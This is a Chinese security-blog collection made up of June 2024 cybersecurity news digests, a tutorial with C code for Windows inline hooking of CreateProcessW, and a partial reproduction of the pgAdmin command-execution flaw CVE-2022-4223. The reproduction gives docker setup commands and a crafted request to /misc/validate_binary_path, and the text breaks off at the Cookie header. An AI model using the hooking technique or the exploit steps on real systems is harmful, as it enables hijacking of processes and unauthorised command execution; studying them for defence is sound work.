网络安全日报 2024年06月18日
1、NiceRAT恶意软件通过盗版软件针对韩国用户 https://asec.ahnlab.com/en/66790/ 研究人员发现威胁行为体正在部署一种名为NiceRAT的恶意软件,并将被感染的设备纳入其僵尸网络。研究人员表示,这些攻击主要针对南韩用户,感染途径被设计成通过盗版软件传播,例如破解版的Microsoft Windows或提供Microsoft Office许可证验证的工具。 2、新的ARM TIKTAG攻击影响Chrome和Linux系统 https://arxiv.org/pdf/2406.08719 一种名为“TIKTAG”的新型攻击方式主要针对ARM的内存标记扩展(MTE),能够以超过95%的成功率泄露内存中的数据,并同时允许黑客绕过该设备中的MTE安全功能,MTE是ARM v8.5-A架构(及更高版本)中添加的功能,旨在检测和防止内存损坏。由三星、首尔国立大学和乔治亚理工学院的韩国研究团队共同签署的论文展示了针对Google Chrome和Linux内核实现此类攻击。 3、黑客入侵合法网站伪装更新分发BadSpace后门程序 https://www.gdatasoftware.com/blog/2024/06/37947-badspace-backdoor 被入侵的合法网站正被用作传播Windows后门程序BadSpace,攻击者将网站伪装成浏览器更新作为幌子欺骗目标访问。研究人员在一份报告中表示:“威胁行为体使用多阶段的攻击链,涉及被感染的网站、命令与控制(C2)服务器,以及用于在受害者系统中部署BadSpace后门的JScript下载器。” 4、奥地利非营利组织指控谷歌隐私沙盒存在用户跟踪 https://noyb.eu/en/google-sandbox-online-tracking-instead-privacy 谷歌计划在其Chrome浏览器中弃用第三方跟踪Cookie并推出隐私沙盒的计划遇到新的问题,奥地利隐私非营利组织noyb(none of your business)表示该功能仍可用于跟踪用户。noyb表示:“虽然所谓的‘隐私沙盒’被宣传为对第三方跟踪的隐私层面改进,但现在跟踪只是由谷歌在浏览器内进行。”为了实现这一点,该公司理论上需要用户的知情同意,然后谷歌却通过假装‘打开广告隐私功能’来欺骗用户同意。” 5、电信诈骗盯上高考考生:发短信称“有作弊行为”并引导回电 https://www.ithome.com/0/775/189.htm 据工信部反诈专班、中国警察网今日通报,近期有网友反映,高考后收到了声称自己在考试中“被监控发现有作弊行为,该科成绩为 0 分”的信息,并留下了当地“教育部门”的电话,引导其致电“咨询详细情况”。 6、苹果、谷歌等因涉嫌违规收集用户数据被韩国罚款超2亿韩元 https://www.ithome.com/0/775/024.htm 因涉嫌未经用户同意收集位置数据、违反披露位置数据政策条款等行为,苹果被韩国监管机构处以 2.1 亿韩元(当前约 111.1 万元人民币)的罚款。 7、虚假2024年巴黎夏季奥运会门票已在网络中出现 https://cybernews.com/news/fake-paris-2024-summer-olympic-games-tickets/ Proofpoint的研究人员在谷歌上搜索了2024年巴黎奥运会的门票。在众多结果中,他们发现了一个指向欺诈网站的链接。 8、半导体厂商Kulicke & Soffa泄露了1200万份文件 https://cybersecuritynews.com/kulicke-soffa-data-breach/ 领先的半导体封装和电子组装解决方案提供商 Kulicke and Soffa Industries, Inc. (K&S) 披露了一起数据泄露事件,该事件已泄露了大约 1200 万个文件。 9、暗网市场Empire Market 运营者被指控促成4.3 亿美元非法交易 https://securityaffairs.com/164619/deep-web/empire-market-owners-charged.html 联邦当局指控两名个人运营暗网市场 Empire Market,促成了超过 4.3 亿美元的非法交易。这两名男子被指控促成了超过 400 万笔交易,总价值超过 4.3 亿美元,涉及非法商品和服务。当局指控他们犯有多项罪行,包括贩毒、计算机欺诈、访问设备欺诈、伪造和洗钱,最高可判处终身监禁。佩维和汉密尔顿目前被美国执法部门拘留,尚未安排提审。 10、香港中文大学遭遇黑客攻击致大规模数据泄露 https://www.anquanke.com/post/id/297316 据香港中文大学CUSCS 称,泄露的数据包括 20,870 个 Moodle 帐户的姓名、电子邮件地址和学生编号,这些帐户包括导师、学生、毕业生和访客。据报道,这些个人数据是在该机构一所学校的服务器遭到黑客攻击后被盗的。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月17日
1、研究人员发现针对错误配置Kubernetes集群的挖矿活动 https://www.wiz.io/blog/dero-cryptojacking-campaign-adapts-to-evade-detection 研究人员警告称,一场正在进行的加密劫持活动正针对配置错误的Kubernetes集群来挖掘Dero加密货币。在这次事件中,威胁行为者利用对互联网开放的集群的匿名访问来启动恶意容器镜像,这些镜像托管在Docker Hub上,有些已超过10000次下载。这些Docker镜像包含一个UPX包装的DERO挖矿程序,名为‘pause’。 2、Black Basta勒索软件疑似利用微软Windows零日漏洞 https://symantec-enterprise-blogs.security.com/threat-intelligence/black-basta-ransomware-zero-day 据研究人员的新发现,与Black Basta勒索软件有关的威胁行为者可能利用了最近披露的微软Windows错误报告服务中的权限提升漏洞作为零日漏洞。该安全漏洞是CVE-2024-26169(CVSS评分:7.8),是Windows错误报告服务中的一个权限提升漏洞,可能被利用以获得SYSTEM权限。微软于2024年3月修补了该漏洞。研究人员团队表示:“对最近攻击中部署的漏洞利用工具的分析显示,其编译 3、Arid Viper组织利用AridSpy木马发起移动端间谍活动 https://www.welivesecurity.com/en/eset-research/arid-viper-poisons-android-apps-with-aridspy/ 据研究人员发布的一份报告称,名为Arid Viper的威胁行为者被认为与利用被植入木马的Android应用程序分发间谍软件AridSpy的移动间谍活动有关。研究人员说:“恶意软件通过冒充各种消息应用程序、工作机会应用程序和巴勒斯坦民事登记应用程序的专用网站传播。这些通常是通过添加AridSpy恶意代码而被植入木马的现有应用程序。”据称,自2022年以来,这一活动已涉及多达五个行动,研究人员记录了AridSp 4、Veeam恢复编排器严重认证绕过漏洞利用代码被公开 https://summoning.team/blog/veeam-recovery-orchestrator-auth-bypass-cve-2024-29855/ 一个关键的Veeam恢复编排器(VRO)认证绕过漏洞(编号CVE-2024-29855)的概念验证(PoC)利用已发布,增加了被攻击利用的风险。该漏洞利用由安全研究员Sina Kheirkha开发,他还在自己的网站上发布了详细的文章。文章展示了该漏洞实际上比供应商公告所暗示的更容易被利用。CVE-2024-29855在CVSS v3.1中被评为9.0(“关键”),是影响Veeam恢复编排器版本7.0.0.337和7.1.0.2 5、Life360平台客户数据泄露后遭遇攻击者勒索 http://www.tile.com/en-us/blog/unauthorized-access-incident-2024 安全和位置服务公司Life360表示,在威胁行为者入侵并窃取Tile客户支持平台的敏感信息后,他们成为勒索企图的目标。Life360为全球超过6600万会员提供实时位置跟踪、碰撞检测和紧急道路援助服务。2021年12月,Life360以2.05亿美元收购了蓝牙追踪服务提供商Tile。周三,Life360透露,一名攻击者入侵了Tile客户支持平台,获取了姓名、地址、电子邮件地址、电话号码和设备识别号码等信息。Life360 CEO Chris Hulls表示:“与许 6、AWS增加支持Passkey的多因素认证方案需用户启用MFA http://aws.amazon.com/blogs/security/passkeys-enhance-security-and-usability-as-aws-expands-mfa-requirements/ Amazon Web Services(AWS)引入了FIDO2 Passkey作为一种新的多因素认证(MFA)方法,以增强账户安全性和可用性。此外,正如去年10月宣布的那样,该互联网公司提醒我们,“root” AWS账户必须在2024年7月底之前启用MFA。FIDO2 Passkey是物理(硬件密钥)或基于软件的认证解决方案,利用公钥加密(公钥+私钥对)来签署服务器发送的用 7、美国Truist银行泄露数据被公开在黑客论坛出售 https://www.bleepingcomputer.com/news/security/truist-bank-confirms-data-breach-after-stolen-data-shows-up-on-hacking-forum/ 领先的美国商业银行Truist确认其系统在2023年10月的一次网络攻击中被入侵,此前一名威胁行为者在黑客论坛上出售该公司的部分数据。总部位于北卡罗来纳州夏洛特市的Truist银行是在2019年12月SunTrust银行和BB&T(分行银行和信托公司)合并后成立的。现在,Truist已成为总资产达5350亿美元的前十大商业银行,提供广泛的服务,包 8、美国医疗系统巨头Ascension遭遇勒索软件攻击 https://about.ascension.org/en/cybersecurity-event 美国最大的医疗系统之一Ascension透露,2024年5月的勒索软件攻击是由一名员工下载恶意文件到公司设备引起的。Ascension表示,这可能是一次“无心之失”,因为该员工以为他们下载的是一个合法文件。该攻击影响了MyChart电子健康记录系统、电话和用于订购测试、手术和药物的系统,促使这家医疗巨头在5月8日将一些设备下线,以遏制当时被描述为“网络安全事件”。这迫使员工以纸质记录程序和药物,因为他们无法再电子访问病人记录。Ascension还暂停了一些非紧急选择性手术、测试和预约,并将急 9、华硕修复了多款路由器中严重的身份验证绕过漏洞 https://securityaffairs.com/164549/security/asus-router-models-critical-rce.html 华硕解决了一个严重的远程身份验证绕过漏洞,该漏洞编号为 CVE-2024-3080 (CVSS v3.1 分数:9.8),影响七种路由器型号。该漏洞是一个身份验证绕过问题,远程攻击者可以利用该漏洞无需身份验证即可登录设备。 10、网络犯罪分子使用PhantomLoader分发SSLoad恶意软件 https://intezer.com/blog/research/ssload-technical-malware-analysis/ 根据网络安全公司的发现,新出现的SSLoad恶意软件通过一种以前未记录的加载程序PhantomLoader进行分发。安全研究员在本周发布的一份报告中表示:“加载程序通过二进制修补文件并使用自修改技术来规避检测,添加到合法的DLL(通常是EDR或AV产品)中。”SSLoad可能通过恶意软件即服务(MaaS)模式提供给其他威胁行为者,由于其不同的分发方法,通过网络钓鱼邮件渗透系统,进行侦察,并向受害者推送其他类型的恶意软件。研究人员此前的报告揭示了使用SSLo 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月14日
1、VBEM平台身份认证绕过漏洞利用代码被公开 https://summoning.team/blog/veeam-enterprise-manager-cve-2024-29849-auth-bypass/ 一个针对Veeam Backup Enterprise Manager身份验证绕过漏洞(CVE-2024-29849)的概念验证(PoC)利用代码现已公开,使管理员必须紧急应用最新的安全更新。Veeam Backup Enterprise Manager(VBEM)是一个基于Web的平台,用于通过Web控制台管理Veeam Backup & Replication安装。它有助于控制备份任务并在组织的备份基础设施和大规模部署中执行恢复 2、Google警告Pixel固件中存在已被利用的零日漏洞 https://source.android.com/docs/security/bulletin/pixel/2024-06-01 Google警告称,影响Pixel固件的安全漏洞在野外被作为零日漏洞利用。这个高严重性漏洞被标记为CVE-2024-32896,被描述为Pixel固件中的权限提升问题。该公司未分享任何与利用此漏洞的攻击性质相关的详细信息,但指出“有迹象表明CVE-2024-32896可能正在有限的、针对性的利用中。2024年6月的安全更新解决了总共50个安全漏洞,其中五个涉及高通芯片组的各种组件。 3、BlackBerry Cylance公司称泄露数据出自第三方合作平台 https://www.bleepingcomputer.com/news/security/cylance-confirms-data-breach-linked-to-third-party-platform/ 网络安全公司Cylance确认在黑客论坛上出售的数据是从“第三方平台”窃取的旧数据。名为Sp1d3r的威胁行为者正在以75万美元出售这些被盗数据,这些数据据称包括大量信息,如3400万个客户和员工的电子邮件以及Cylance客户、合作伙伴和员工的个人身份信息。然而,研究人员称泄露的样本似乎是Cylance使用的旧营销数据。该公司称相关数据是从一个与BlackBerry无关的第三方 4、研究人员发现已有数百万次安装的恶意VSCode扩展 https://www.bleepingcomputer.com/news/security/malicious-vscode-extensions-with-millions-of-installs-discovered/ 一组以色列研究人员探索了Visual Studio Code市场的安全性,并通过将流行的“Dracula Official”主题的副本特洛伊化为包含风险代码,成功“感染”了超过100个组织。进一步的研究发现,VSCode Marketplace上有数千个扩展程序,安装次数达到了数百万。Visual Studio Code(VSCode)是由微软发布的源代码编辑器,许多专 5、Chrome 浏览器扩展 EmailGPT 曝出高危零日漏洞 https://www.itsec.ru/news/rasshireniye-emailgpt-dlia-pochti-google-soderzhit-neispravlennuyu-0day-uyazvimost 安全漏洞由 Synopsys 网络安全研究中心的专家发现并上报,追踪为 CVE-2024-5184(CVSS 得分为 6.5),是一个 "提示注入 "类型的漏洞,允许威胁攻击者操纵服务并盗取敏感信息,可能引发知识产权泄露、拒绝服务和大额经济损失。 6、工信部发布关于防范CatDDoS团伙网络攻击的风险提示 https://www.secrss.com/articles/66958 近日,工业和信息化部网络安全威胁和漏洞信息共享平台(CSTIS)监测发现,CatDDoS黑客团伙利用知名厂商网络产品安全漏洞传播恶意样本,在全球范围内实施分布式拒绝服务(DDoS)攻击。 7、新型攻击技术“Sleepy Pickle”瞄准机器学习模型 https://thehackernews.com/2024/06/new-attack-technique-sleepy-pickle.html 一种被称为“Sleepy Pickle”的新型“混合机器学习 (ML) 模型利用技术”的发现, Pickle 格式所带来的安全风险再次凸显出来。根据 Trail of Bits 的说法,这种攻击方法利用用于打包和分发机器学习 (ML) 模型的普遍格式来破坏模型本身,对组织的下游客户构成严重的供应链风险。 8、谷歌安卓系统在巴西测试人工智能驱动的新防盗功能 https://cybernews.com/tech/google-android-tests-ai-anti-theft-feature-brazil/ 谷歌选择在巴西测试所有安卓智能手机的新人工智能防盗功能,使这个南美国家成为这项新防盗技术的首批试用国。该功能的设计初衷是利用人工智能检测手机是否被盗,一旦检测到,手机就会自动远程锁定主屏幕。 9、卡巴斯基揭露中控考勤终端中的 24 个漏洞 https://www.kaspersky.com/about/press-releases/2024_kaspersky-finds-24-vulnerabilities-in-chinese-biometric-access-systems 卡巴斯基发现国际制造商 ZKTeco 生产的混合生物识别终端存在大量漏洞。通过向数据库添加随机用户数据或使用伪造的二维码,恶意攻击者可以轻松绕过验证过程并获得未经授权的访问权限。攻击者还可以窃取和泄露生物识别数据、远程操纵设备并部署后门。 10、Airbnb等旅游类未经允许收集数据,索取手机权限 https://www.freebuf.com/news/403449.html 据CyberNews独家研究的消息,无论是Booking、Airbnb、希尔顿还是丽笙,这些市场上Top级别的酒店或旅行类相关应用程序都会不同程度地尝试在未询问的情况下获取用户敏感权限及数据。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
网络安全日报 2024年06月13日
1、克利夫兰市遭遇网络攻击迫使关闭其IT系统 https://fox8.com/news/cleveland-city-hall-investigating-cyber-incident-i-team/ 俄亥俄州克利夫兰市目前正在应对一场网络攻击,这场攻击迫使其关闭了面向市民的服务,包括Erieview和市政厅的公共办公室和设施。克利夫兰大都市区人口超过200万人,是一个重要的医疗、制造、金融、物流、教育和技术中心,也是俄亥俄州最重要的经济中心。这次中断首次在昨天被披露,当时市政当局警告说,由于网络事件,公共服务已减少到基本操作。今天早些时候通过X上的一条线程提供的状态更新解释说,事件仍在第三方专家的帮助下进行调查。同时,市政厅和Eri 2、微软发布六月份安全补丁修复了51个漏洞 https://msrc.microsoft.com/update-guide/releaseNote/2024-Jun 微软已经发布了更新,修复了51个漏洞,这是其2024年6月补丁星期二更新的一部分。在这51个漏洞中,一个被评为关键漏洞,50个被评为重要漏洞。除此之外,还解决了上个月基于Chromium的Edge浏览器中的17个漏洞。这些安全漏洞中没有一个在野外被积极利用,只有一个在发布时被列为公开已知漏洞。这涉及一个第三方建议,跟踪编号为CVE-2023-50868(CVSS评分:7.5),这是一个影响DNSSEC验证过程的拒绝服务问题,可能导致DNSSEC验证解析器上的CPU耗尽。 3、JetBrains警告IDE漏洞可暴露GitHub访问令牌 https://blog.jetbrains.com/security/2024/06/updates-for-security-issue-affecting-intellij-based-ides-2023-1-and-github-plugin/ JetBrains警告客户修补影响其IntelliJ集成开发环境(IDE)应用程序的关键漏洞,该漏洞暴露了GitHub访问令牌。此安全漏洞的跟踪编号为CVE-2024-37051,影响所有2023.1及以后的基于IntelliJ的IDE,其中启用了并配置/使用了JetBrains GitHub插件。“2024年5月29日,我们收到了外部安全报 4、TellYouThePass勒索软件利用最新PHP RCE漏洞 https://www.imperva.com/blog/update-cve-2024-4577-quickly-weaponized-to-distribute-tellyouthepass-ransomware/ TellYouThePass勒索软件团伙一直在利用最近修补的CVE-2024-4577远程代码执行漏洞,通过PHP传递webshell并在目标系统上执行加密器负载。攻击于6月8日开始,仅在PHP维护者发布安全更新后不到48小时,攻击者就利用了公开的漏洞利用代码。TellYouThePass勒索软件以快速利用具有广泛影响的公共漏洞而闻名。去年11月,他们在攻击中使用了Apach 5、法国电信巨头Corse GSM 20 万客户信息遭泄露 https://www.anquanke.com/post/id/297181 法国一家大型电信公司Corse GSM遭遇了大规模数据泄露。这可能会对其数百万客户产生潜在影响。Corse GSM 数据泄露事件是由一名威胁行为者在流行的数据黑客网站 BreachForums 上使用别名“ssh_xyz”提出的。 6、Linux nftables 漏洞正被积极利用 https://www.solidot.org/story?sid=78395 安全公司 CrowdStrike 报告,今年早些时候发现的 Linux nftables 漏洞正被活跃利用。该漏洞编号 CVE-2024-1086,是在 2024 年 1 月 31 日披露的,危险评分 7.8/10,属于本地提权漏洞,绝大部分 Linux 发行版已经修复。 7、英国和加拿大正在调查 23andMe 数据泄露事件 https://www.bleepingcomputer.com/news/security/23andme-data-breach-under-investigation-in-uk-and-canada/ 加拿大和英国的隐私机构已经启动了一项联合调查,以评估去年 23andMe 数据泄露事件中暴露的敏感客户信息的范围。 8、Fortinet 修补 FortiOS 中的代码执行漏洞 https://www.securityweek.com/fortinet-patches-code-execution-vulnerability-in-fortios/ Fortinet 已修补 FortiOS 中的多个漏洞,包括一个高严重性代码执行安全漏洞。 9、Chrome 126、Firefox 127 修补高危漏洞 https://www.securityweek.com/chrome-126-firefox-127-patch-high-severity-vulnerabilities/ 谷歌和 Mozilla 周二宣布向稳定渠道发布 Chrome 126 和 Firefox 127,其中包含针对多个高严重内存安全漏洞的补丁。 10、乌克兰警方逮捕了开发Conti 和 LockBit加密组件的黑客 https://securityaffairs.com/164475/breaking-news/developer-crypter-conti-lockbit-ransomware.html 乌克兰网络警察逮捕了一名俄罗斯男子,因为他开发了 Conti 和 LockBit 勒索软件操作中使用的加密器组件。该男子于 2024 年 4 月 18 日在基辅被捕,这是名为“终局行动”的国际执法行动的一部分。 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
浅谈内联钩取原理与实现
前言 导入地址表钩取的方法容易实现但是存在缺陷,若需要钩取的函数不存在导入地址表中,那么我们就无法进行钩取,出现以下几种情况时,导入函数是不会存储在导入地址表中的。 延迟加载:当导入函数还没调用时,导入函数还未写入到导入地址表中。 动态链接:使用LoadLibrary与GetProcAddress函数时,程序是显示获取函数地址的,因此不会写入到导入地址表中。 手动解析导入函数:即程序自身实现一套导入方法,那么此时也不会将导入函数写入到导入地址表中。 有一种钩取方法解决上述问题即内联钩取(inline hook)。 内联钩取(inline hook) 内联钩取实际是找到需要钩取的函数地址,这里与导入地址表钩取不同的是我们不再局限于导入地址表,而是程序中所有的函数地址都能够作为钩取的对象。 这里以CreateProcessW函数为例,在CreateProcessW函数中,第一条指令是mov edi,edi 那么根据钩取的思路,我们将mov edi,edi这条指令修改为jmp xxx(xxx为我们自定义函数的地址),那么在执行CreateaProcessW函数时即可跳转到我们的自定义函数中。 我们获取mov edi,edi指令的地址,并且将该指令篡改为jmp指令,并且把mov edi,edi指令的数据进行存储,那么在执行到CreateProcessW函数时就会执行jmp指令跳转到自定义函数中,在钩取操作时需要将指令写回,还原CreateProcessW函数的执行逻辑,就可以在钩取的同时无碍的执行程序。 那么总结一下内联钩取函数的流程 找到需要钩取的函数的指令地址,这个指令并不仅限于函数起始的指令。 将该指令篡改成跳转指令,跳转的目的就是自定义的函数。 在自定义函数内需要还原被钩取函数的指令。 因此内联钩取的实际就是修改程序执行逻辑,劫持程序的执行流程。由于32位程序与64位程序的汇编语言与寻址方式有些许差异,因此不同机器位数的程序的内联钩取方式不同。 机器码的获取 由于在篡改内存时需要将jmp xxx的机器码填写到内存中,因此做内联钩取时需要获取指令对应的机器码。在C语言中支持内联汇编,因此可以使用内联汇编然后查看对应的机器码即可。 但是直接使用visual studio编译64位程序的内联汇编代码会出错,这是因为visual studio自带的编译工具不支持x64的内联汇编。 因此需要先安装clang编译器 在项目的编译工具选择clang即可 在反汇编窗口中就有机器码了。 32位的内联钩取 首先第一步是确定在32位程序下是如何进行跳转的,在32位情况使用跳转指令是根据偏移获取目的地址,偏移的计算公式如下 跳转偏移 = 跳转目的地址 - 当前指令地址 - 指令长度 因此jmp xxx中,xxx是偏移值而不是目的函数的绝对地址。 紧接着需要确定在32位下跳转指令的机器码是多少,用下面例子看看 void MyCreateProcess() { } int main() { __asm { jmp MyCreateProcess; }; } 可以看到对应的机器码为E9 EB FF FF FF 可以看到目标函数的地址为0xA71000,使用上述公式计算一下偏移为0xA71000 - 0x0A71010 - 5 = 0xffffffeb,因此E9为jmp的机器码 因此需要将待钩取函数的第一条指令修改为E9 XX XX XX XX XX,长度为5个字节 然后选择一个目标函数,这里还是使用CreateProcessW函数作为例子,需要先获取CreateProcessW函数的地址   ...    hMoudle = GetModuleHandleA(szDllName); //获取Kernel32.dll模块的地址    if (hMoudle == NULL)   {        GetLastError();   }        pfnOld = GetProcAddress(hMoudle, funName);//获取CreateProcessW函数地址    if (pfnOld == NULL)   {        GetLastError();   } ... 然后需要保存原始指令,然后修改区域为可写权限,紧接着计算一下偏移把完整的指令写进到待钩取函数即可。 ... //修改权限    VirtualProtect(pfnOld, 5, PAGE_EXECUTE_READWRITE, &dwOldProtect);    //存储原始的5个字节    memcpy(pOrgBytes, pfnOld, 5);    //计算需要跳转到的地址    //跳转偏移 = 跳转目的地址 - 当前指令地址 - 指令长度    dwAddress = (ULONGLONG)pfnNew - (ULONGLONG)pfnOld - 5; //将目标函数的地址写入到指令中    memcpy(&pBuf[1], &dwAddress, 4); //篡改为跳转指令    memcpy(pfnOld, pBuf, 5); //还原权限    VirtualProtect(pfnOld, 5, dwOldProtect, &dwOldProtect); ... 64位的内联钩取 64位下的规则会与32位有差异,但是总体思路是一致的。在32位下我们采用了偏移的方式找到目标函数,在64位下可以换种方式,采用mov rax, xxx; jmp rax,将函数的绝对地址写入寄存器,然后跳转到指定寄存器的方式。 如下例子,我们首先获取自定义函数的绝对地址,紧接着将它存放于寄存器中,紧接着跳转即可。 int main() { __asm { mov rax, 0x1122334455667788; jmp rax; }; } 可以看到mov rax, xxx; jmp rax指令的机器码为48 B8 xx xx xx xx xx xx xx xx FF E0,其中由于64位地址都是8字节的,因此需要xx需要填充8字节 因此总体代码与32位区别不大,这里需要注意的是篡改的指令长度需要根据实际进行更改。    /*    * 48 B8 88 77 66 55 44 33 22 11 mov rax, 0x1122334455667788    * FF E0                         jmp rax    * 需要12个字节进行跳转    */    //修改区域权限    VirtualProtect((LPVOID)pfnOrg, 12, PAGE_EXECUTE_READWRITE, &dwOldProtect);    //保存原有的12字节数据    memcpy(pOrgBytes, pfnOrg, 12);    //将HOOK函数的地址填进缓冲区    //将目标地址拷贝到指令中    memcpy(&pBuf[2], &pfnNew, 8);    //篡改待钩取函数    memcpy(pfnOrg, pBuf, 12);    //恢复权限    VirtualProtect((LPVOID)pfnOrg, 12, dwOldProtect, &dwOldProtect); 因此任意可以修改函数执行流程的汇编指令实际都可以例如push xxx; ret。 完整代码可以参考: https://github.com/h0pe-ay/HookTechnology/tree/main/Hook-InlineHook总结 优势 内联钩取相较于导入表钩取的选择性更广,可以选择任意的函数及函数内的任意指令地址。 劣势 每次都需要脱钩后再进行挂钩,影响效率 多线程写入时可能会出错
网络安全日报 2024年06月12日
1、Arm公司警告Mali GPU驱动程序中已被利用的零日漏洞 https://developer.arm.com/Arm%20Security%20Center/Mali%20GPU%20Driver%20Vulnerabilities Arm警告说,Mali GPU内核驱动程序中存在一个安全漏洞,该漏洞已在野外被积极利用。该漏洞被追踪为CVE-2024-4610,使用后释放(use-after-free)问题影响以下产品:Bifrost GPU内核驱动程序(从r34p0到r40p0的所有版本)、Valhall GPU内核驱动程序(从r34p0到r40p0的所有版本)。“一个本地非特权用户可以通过不当的GPU内存处理操作访问已释放的内存。”该公司在上周 2、Snowflake数据泄露事件影响上百家企业信息 https://thehackernews.com/2024/06/snowflake-breach-exposes-165-customers.html 多达165名Snowflake客户的信息可能在一场正在进行的数据盗窃和勒索活动中暴露,这表明该操作的影响比之前认为的更广泛。研究人员正在协助云数据仓库平台进行事件响应工作,正在追踪这一尚未分类的活动集群,称之为UNC5537,并将其描述为一个以财务为动机的威胁行为者。UNC5537正在系统地利用被盗的客户凭证入侵Snowflake客户实例,在网络犯罪论坛上广告受害者数据,并试图勒索许多受害者。UNC5537已经针对全球数百个组织,并经常通 3、Gitloker攻击滥用GitHub通知传播恶意oAuth应用 https://www.bleepingcomputer.com/news/security/gitloker-attacks-abuse-github-notifications-to-push-malicious-oauth-apps/ 攻击者假冒GitHub的安全和招聘团队,通过网络钓鱼攻击使用恶意OAuth应用劫持存储库,在持续的勒索活动中擦除被破坏的存储库。自至少2月份以来,数十名开发人员在这次活动中收到类似的假工作邀请或安全警报电子邮件,这些邮件来自"notifications@github.com",这些邮件是在被破坏的GitHub账户使用的垃圾评论中标记在随机存储库问题或拉取 4、More_eggs恶意软件通过伪装简历对招聘人员发起网络钓鱼攻击 https://www.esentire.com/blog/more-eggs-activity-persists-via-fake-job-applicant-lures 研究人员发现了一起通过伪装成简历分发More_eggs恶意软件的钓鱼攻击,这种技术最早在两年前被检测到。具体来说,目标对象是一名招聘人员,威胁行为者通过伪装成求职者欺骗他们,并诱导他们访问其网站以下载加载程序,More_eggs被认为是一个名为Golden Chickens(又名Venom Spider)的威胁行为者的作品,是一个模块化后门,能够收集敏感信息。它以恶意软件即服务(MaaS)模式提供给其他犯罪行为者。 5、Apple 修复了其虚拟现实头戴设备Vision Pro 漏洞 https://www.securityweek.com/apple-patches-vision-pro-vulnerability-used-in-first-ever-spatial-computing-hack/ 苹果公司周一将其 Vision Pro 虚拟现实头戴设备的操作系统 visionOS 更新至 1.2 版本,该版本修复了多个漏洞,其中包括可能是该产品特有的第一个安全漏洞。visionOS 1.2 修补了近二十个漏洞。然而,这些漏洞中的绝大多数都存在于 visionOS 与其他 Apple 产品(如 iOS、macOS 和 tvOS)共享的组件中。 6、多个漏洞影响已停产的 Netgear WNR614 路由器 https://www.securityweek.com/multiple-vulnerabilities-plague-discontinued-netgear-wnr614-routers/ Redfox Security 警告称,已停产的 Netgear WNR614 路由器中存在漏洞,允许攻击者绕过身份验证、拦截通信和检索凭据。 7、微软修复了Microsoft 消息队列中的远程代码执行漏洞 https://www.securityweek.com/patch-tuesday-remote-code-execution-flaw-in-microsoft-message-queuing/ 微软周二呼吁 Windows 管理员紧急关注微软消息队列 (MSMQ) 组件中一个严重的远程代码执行漏洞的补丁。该漏洞被标记为CVE-2024-30080,CVSS 严重性评分为 9.8/10,攻击者可以通过向 MSMQ 服务器发送特制的恶意 MSMQ 数据包来利用该漏洞。 8、日本视频网站NicoNico遭遇网络攻击被迫暂停服务 https://securityaffairs.com/164395/security/niconico-victim-cyber-attack.html 2024 年 6 月 8 日,日本视频共享平台 Niconico 遭受大规模网络攻击后暂停了服务。针对此次事件,公司暂时停止了Niconico视频、Niconico直播、Niconico频道等Niconico家庭服务,并暂停了外部服务上的Niconico账号登录。 9、因舆论压力,微软将Recall功能默认设置为关闭 持续不断的公众投诉,微软已经意识到其最近预览的 Windows Recall 功能的安全性有很多不足之处,并宣布了重要改变。该功能现在是可选的。“如果你不主动选择打开它,它将默认关闭。” 10、大选开始之际,欧盟各政党遭受 DDoS 攻击 近日,欧洲议会选举在荷兰正式启动,未来几天将陆续在欧盟其它国家举行,这一时期成为了网络攻击事件的”高发期“。Cloudflare 在一份报告中指出,大量威胁攻击者正在针对欧洲各国的政党,发动大规模 DDoS 攻击。 https://www.freebuf.com/news/403170.html 声明 以上内容原文来自互联网的公共方式,仅用于有限分享,译文内容不代表蚁景科技观点,因此第三方对以上内容进行分享、传播等行为,以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的,若产生法律责任,译者与蚁景科技一律不予承担。
pgAdmin未授权命令执行漏洞(CVE-2022-4223)
https://ftp.postgresql.org/pub/pgadmin/pgadmin4/v5.7/source/pgadmin4-5.7.tar.gz 下载 pgadmin5.7 的源码 首先从代码层面进行分析 接口 /validate_binary_path 最后调用了 subprocess.getoutput( 来执行了命令 这一部分代码是对传入的路径进行检测,如果是在 linux 下直接拼接,在windows 下部署,后缀中会添加 .exe 。同时 windows下恶意的exe文件必须是下面几个文件名之一 'pg_dump', 'pg_dumpall', 'pg_restore', 'psql' linux 可以从 docker hub 上搜索 docker 资源 https://hub.docker.com/search?q=pgadmin docker pull dpage/pgadmin4:6.16 docker run -e 'PGADMIN_DEFAULT_EMAIL=test@example.com' -e 'PGADMIN_DEFAULT_PASSWORD=123456'  -p 5050:80 --name pgadmin -d  docker.io/dpage/pgadmin4:6.16 直接构造发送会提示 The CSRF token is missing. 所以我们先请求路由 login POST /misc/validate_binary_path HTTP/1.1 Host: 127.0.0.1:5050 Upgrade-Insecure-Requests: 1 X-pgA-CSRFToken:ImI1OWE1NjQ3ZDZlYjBkYzFmMjgzYzE3MTEyMGRiZTA0MWYwM2YwMjgi.ZhUBBQ.S3V3X0JmCbEcwcpWZkf1TVYVRS4 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: 